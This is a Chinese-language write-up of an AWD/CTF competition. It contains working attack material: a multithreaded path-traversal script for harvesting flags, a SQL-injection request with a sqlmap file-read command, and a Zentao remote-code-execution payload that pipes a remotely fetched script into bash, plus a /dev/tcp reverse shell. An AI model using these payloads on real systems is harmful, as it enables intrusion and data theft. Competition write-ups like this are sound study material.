AWD

靶机1

访问地址

http://192.168.103.*:8080/frontend/ajax/getfile?file=../../../../../../flag.txt

即可利用此任意文件下载漏洞

使用python写脚本批量跑

import concurrent.futures
import re

import requests

proxies = {'http': ''}

headers = {
    'cookie': '1'
}
result = []

def read_ip_list(filename):
    with open(filename, 'r') as file:
        ip_list = [ip.strip() for ip in file]
    return ip_list


def exp_get(ip):
    url = f'http://{ip}:8080/frontend/ajax/getfile?file=../../../../../../flag.txt'
    # print(f'GET:{url}')
    try:
        resp = requests.get(url=url, headers=headers, proxies=proxies, timeout=3)
        match = re.search('(flag{\S+})', resp.text)
        if match:
            print(match.group(0))

        return resp
    except:
        return False


def exp_post(ip, params, data):
    url = f'http://{ip}{params}'
    print(f'POST:{url}')
    try:
        resp = requests.post(url=url, headers=headers, data=data, proxies=proxies)
        return resp
    except:
        return False


def main(ip_list):
    # 设置最大线程数
    MAX_THREADS = 255  # 可以根据需求调整

    # 使用 ThreadPoolExecutor 创建线程池并执行任务
    with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_THREADS) as executor:
        executor.map(exp_get, ip_list)


if __name__ == '__main__':
    ip_list = read_ip_list('living.txt')
    main(ip_list)

靶机2

登录框存在sql注入漏洞,直接上sqlmap就能跑出flag

请求包

POST /check_login HTTP/1.1
Host: 192.168.103.*:8080
Content-Length: 23
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.103.*:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.103.*:8080/login.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=xxxxxxxxx
Connection: close

user=admin&password=*

然后配合sqlmap

python sqlmap.py -r 1.txt --batch -file-read=/flag.txt

即可读取到flag,会生成在sqlmap的目录下。

CFS

第二题

通过burp爆破得弱密码Passw0rd

禅道Nday,导致远程RCE,利用版本含有18.0 bate1

image-20240421172924210

构造两个请求包和一个flag.sh反弹shell

POST /index.php?m=repo&f=create&objectID=0 HTTP/1.1
Host: 192.168.103.1
Content-Length: 157
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.103.1
Referer: http://192.168.103.1/index.php?m=repo&f=create&objectID=0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: zentaosid=6otb2is8oog59d39gcn5g5tt5k; device=desktop; theme=default; lastProject=2; lang=zh-cn; hideMenu=false; storyModule=0; storyBranch=all; treeBranch=all; productStoryOrder=id_desc; preBranch=0; goback=%7B%22execution%22%3A%22http%3A%5C%2F%5C%2F192.168.103.1%5C%2Findex.php%3Fm%3Dproduct%26f%3Dall%22%2C%22project%22%3A%22http%3A%5C%2F%5C%2F192.168.103.1%5C%2Findex.php%3Fm%3Dproject%26f%3Dbrowse%22%2C%22admin%22%3A%22http%3A%5C%2F%5C%2F192.168.103.1%5C%2Findex.php%3Fm%3Dadmin%26f%3DresetPWDSetting%22%2C%22product%22%3A%22http%3A%5C%2F%5C%2F192.168.103.1%5C%2Findex.php%3Fm%3Dproduct%26f%3Dall%22%7D; preProductID=2; windowWidth=1504; windowHeight=809; tab=devops
Connection: close

product%5B%5D=1&projects%5B%5D=2&SCM=Gitlab&serviceProject=0&name=test&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid=6624c5716503e
POST /index.php?m=repo&f=edit&repoID=0 HTTP/1.1
Host: 192.168.103.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.103.1/index.php?m=repo&f=edit&repoID=1&objectID=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Origin: http://192.168.103.1
Connection: close
Cookie: zentaosid=07ookbs94j2r2i6qraleo4k45v; lang=zh-cn; device=desktop; theme=default; windowWidth=1600; windowHeight=389
Upgrade-Insecure-Requests: 1

SCM=Subversion&client=`curl http://192.168.1.169:8000/flag.sh|bash`
bash -i >& /dev/tcp/192.168.1.168/6666 0>&1

即可反弹shell

image-20240421173059427

flag02.txt得flag

同时在/home/ctf找到flag03.txt,但是没权限,要提权,没时间打出来了。

第三题第一问

扫目录下载一个压缩包,解压流量包,爆破密码为123456,得到第一个flag

第三题第二问

image-20240421133729511

赛后

听说flag01在禅道后台,但是没环境了,只能说血亏。

第二题

当时反弹SHELL之后,在根目录找到一个secret文件夹

image-20240422150731225

里面有一个scret.zip

但是当时压缩包密码没爆破出来,赛后爆破出来时20240321(还以为是20240421).

里面是一个文件,叫easynote_,队友pwn手一看名字以为是pwn,但是文件格式不对(但后来发现确实是pwn)

image-20240422151059323

放在根目录,还在secret文件夹,不可能没用。带入misc角度看看,怀疑是个压缩包

文件头倒置的压缩包,文件头504B0304,写个脚本倒回来试试。

先用010复制出来十六进制数据(也可以用脚本),然后读取每四个字节写入

with open('data.txt', 'r')as f:
    with open('result.txt', 'ab') as ff:
        string = f.read()
        number = int(len(string)/4)
        for i in range(number):
            result = string[i*4:i*4+4]
            print(result[::-1])
            ff.write(bytes.fromhex(result[::-1]))

这个脚本有一点问题,由于每四个字节读取,最后文件字节总数不是4的倍数,导致丢掉一个00

image-20240422151654663

不过发现不影响压缩包打开

弄出来flag04.txt和真正的pwn题源码

flag{6b80a45c6a2ef3db0f1d2988d913bf70}

image-20240422151734292

只能说压缩包密码想不到,血亏。

(队友pwn爷看源码,说跟Ciscn2022的一个pwn题很像..)